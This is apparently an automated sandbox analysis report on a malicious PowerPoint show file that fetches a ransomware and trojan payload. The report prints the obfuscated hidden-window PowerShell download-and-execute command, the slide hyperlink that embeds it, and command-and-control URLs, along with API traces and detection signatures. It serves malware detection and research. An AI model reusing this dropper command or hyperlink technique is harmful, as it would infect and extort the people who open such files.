Analysis Report

Overview

General Information

Joe Sandbox Version:	19.0.0
Analysis ID:	281044
Start time:	17:15:38
Joe Sandbox Product:	Cloud
Start date:	28.05.2017
Overall analysis duration:	0h 11m 4s
Report type:	full
Sample file name:	order.ppsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled VBA Instrumentation enabled
Detection:	MAL
Classification:	mal96.evad.rans.troj.winPPSX@15/8@1/3
HCA Information:	Successful, ratio: 92% Number of executed functions: 34 Number of non-executed functions: 232
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Found application associated with file extension: .ppsx Found Word or Excel or PowerPoint document Simulate clicks Found security dialog Click Ok Number of clicks 104 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: POWERPNT.EXE, powershell.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	96	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook

Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine

Signature Overview

Click to jump to signature section

Spam, unwanted Advertisements and Ransom Demands:

Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\ii.jse

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

10_2_004022E6

Networking:

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /c.php HTTP/1.1Host: cccn.nlConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2.2 HTTP/1.1Host: cccn.nl

Found strings which match to known social media urls

Show sources

Source: wscript.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: cccn.nl

Urls found in memory or binary data

Show sources

Source: powershell.exe	String found in binary or memory: file://
Source: POWERPNT.EXE, powershell.exe	String found in binary or memory: file:///
Source: POWERPNT.EXE	String found in binary or memory: file:///(
Source: POWERPNT.EXE, powershell.exe	String found in binary or memory: file:///c:
Source: powershell.exe	String found in binary or memory: file:///c:/w
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowsp
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/
Source: powershell.exe	String found in binary or memory: file:///c:/windows/system32/windowspowershell/v1.0/$
Source: POWERPNT.EXE	String found in binary or memory: file:///x
Source: powershell.exe	String found in binary or memory: http://
Source: powershell.exe	String found in binary or memory: http://ccc
Source: powershell.exe	String found in binary or memory: http://cccn.nl
Source: powershell.exe	String found in binary or memory: http://cccn.nl/2.2
Source: powershell.exe	String found in binary or memory: http://cccn.nl/2.2h
Source: powershell.exe	String found in binary or memory: http://cccn.nl/c.php
Source: wscript.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: wscript.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: wscript.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: wscript.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: wscript.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: powershell.exe	String found in binary or memory: http://h
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/cimbinding/associationfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/1/wsman/selectorfilter
Source: powershell.exe	String found in binary or memory: http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd#identifyresponseh
Source: wscript.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: wscript.exe	String found in binary or memory: http://www.usertrust.com1
Source: wscript.exe	String found in binary or memory: https://185.159.82.38:45000/c/pollos.php?add=e9e45de07d328e8d46adf4357840be5e&506&uid=883565492&out=
Source: wscript.exe	String found in binary or memory: https://secure.comodo.com/cps0

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /c.php HTTP/1.1Host: cccn.nlConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2.2 HTTP/1.1Host: cccn.nl

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49235 -> 185.159.82.38:45000

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,		10_2_0040C5E5
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,		13_2_0006C5E5

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\certutil.exe

File created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

May use bcdedit to modify the Windows boot settings

Show sources

Source: powershell.exe	Binary or memory string: bcdedit.exe
Source: wscript.exe	Binary or memory string: ~Wbcdedit.exe

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''

Contains a malicious href mouse over activity

Show sources

Source: slide1.xml.rels

Binary or memory string: <Relationship Id="rId2" Target="powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadFile(%27http%3A%27%2B%5Bchar%5D%200x2F%2B%5Bchar%5D%200x2F%2B%27cccn.nl%27%2B%5Bchar%5D%200x2F%2B%27c.php%27%2C%5C%22%24env%3Atemp%5Cii.jse%5C%22)%3B%20Invoke-Item%20%5C%22%24env%3Atemp%5Cii.jse%5C%22%22" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,

10_2_0040EFB9

PE file contains an invalid checksum

Show sources

Source: 484.exe.2988.dr

Static PE information: real checksum: 0x0 should be: 0x3aa9d

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_00404048 push eax; retf	10_1_00404077
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_00405C9C push eax; ret	10_1_00405DDC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_00403FDF push eax; retf	10_1_00404046
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_1_00404F91 push edx; retf 0065h	10_1_00404F9A

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	10_2_0040BB40
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_00061E16
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_000622E6
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_0006BB40
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	13_2_0006DDBF

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Checks whether correct version of .NET is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: wscript.pdb source: wscript.exe
Source:	Binary string: mscorrc.pdb source: powershell.exe
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe
Source:	Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe
Source:	Binary string: scrrun.pdb source: wscript.exe
Source:	Binary string: wscript.pdbN source: wscript.exe

Classification label

Show sources

Source: classification engine

Classification label: mal96.evad.rans.troj.winPPSX@15/8@1/3

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_0040468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	10_2_0040468D
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,	10_2_00401D22
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,	13_2_00061D22
Source: C:\Windows\System32\mstsc.exe	Code function: 13_2_0006468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,	13_2_0006468D

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

Code function: 10_2_0040D4CA GetProcessHeap,HeapAlloc,GetDesktopWindow,CoInitialize,CoCreateInstance,CoTaskMemFree,StrStrIW,StrStrIW,StrStrIW,StrCpyNW,GetFileAttributesW,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoUninitialize,GetProcessHeap,HeapFree,

10_2_0040D4CA

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVRF8B7.tmp

Found command line output

Show sources

Source: C:\Windows\System32\certutil.exe	Console Write: ...............v....I.n.p.u.t. .L.e.n.g.t.h. .=. .3.1.6.7.6.2........n30........R.a...............Aw,...*.........".....
Source: C:\Windows\System32\certutil.exe	Console Write: ...............v........#......v..0.........................#.......................R.a...........Aw(...................
Source: C:\Windows\System32\certutil.exe	Console Write: ...............v....O.u.t.p.u.t. .L.e.n.g.t.h. .=. .2.3.7.5.6.8.................R.a...........Aw..Aw,...,.........".....
Source: C:\Windows\System32\certutil.exe	Console Write: ...............v........#......v..0.........................#.......................R.a...........Aw(...................
Source: C:\Windows\System32\certutil.exe	Console Write: ...............v........#......v..0.........................#........................C.......)].1.Aw....b.........".....
Source: C:\Windows\System32\certutil.exe	Console Write: ...............v........#......v..0.........................#............................C......5.AwP...................
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.....(...0.......K.......................................!...@@ ...0.E.....0.....\....F"J....p.0.
Source: C:\Windows\System32\cmd.exe	Console Write: ....................A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........X.0.0.E.....V. J............X.0........v,.0.&...`.....,.....
Source: C:\Windows\System32\cmd.exe	Console Write: ......................0.....(...0.......[...........................F.......C....XAw@@ .(.0.}...@.0.....z....F"J......0.
Source: C:\Windows\System32\cmd.exe	Console Write: ........ ............ ....0...0.E. J........ .......@F#J. ....0.0.E. ...V. J..............0........v........`.....,.....

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="0"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="4"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="236"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="316"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="352"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="360"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="388"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="444"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="456"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="464"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="556"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="620"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="672"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="792"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="832"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="856"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="960"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1088"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1200"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1248"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1356"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1432"::GetOwner
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - Win32_Process.Handle="1504"::GetOwner
